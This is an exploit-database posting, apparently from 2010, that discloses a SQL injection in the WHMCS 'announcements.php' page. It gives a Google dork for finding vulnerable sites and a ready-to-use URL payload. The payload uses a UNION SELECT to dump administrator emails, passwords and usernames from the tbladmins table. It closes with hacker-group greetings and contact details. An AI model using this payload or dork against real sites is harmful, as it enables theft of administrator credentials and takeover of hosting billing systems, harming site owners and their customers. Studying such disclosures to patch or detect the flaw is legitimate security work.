WHMCS Control 2 (announcements.php) SQL Injection

EDB-ID: 12481 CVE: N/A OSVDB-ID: N/A
Verified: Author: Islam DefenDers Published: 2010-05-02
Download Exploit: Source Raw Download Vulnerable App: N/A
Software: WHMCS control 2  Sql Injection             
                                                                         
Vulnerability: Remote Sql Injection                                      
Google Dork: Powered by WHMCompleteSolution - or "  inurl:WHMCS   or'     announcements.php   
Off. site: www.MiXaTy.com                                               


Author
Author: Islam DefenDers                            
Date: 2.5.2010                                   
Contact:  email: hackereg@hotmail.com             


Sql Injection
Exploit: http://site/announcements.php?id=1' and 1=0 union all select 1,2,concat(email,0x3d,password),username,5 from tbladmins--                                        
DOWNLOAD : http://www.whmcs.com/                                                                                
Greetz
IsLam DefenDers Mr.HaMaDa 


HaMaDa SCoOoRPioN 

site: www.mixaty.com

E: hackereg@hotmail.com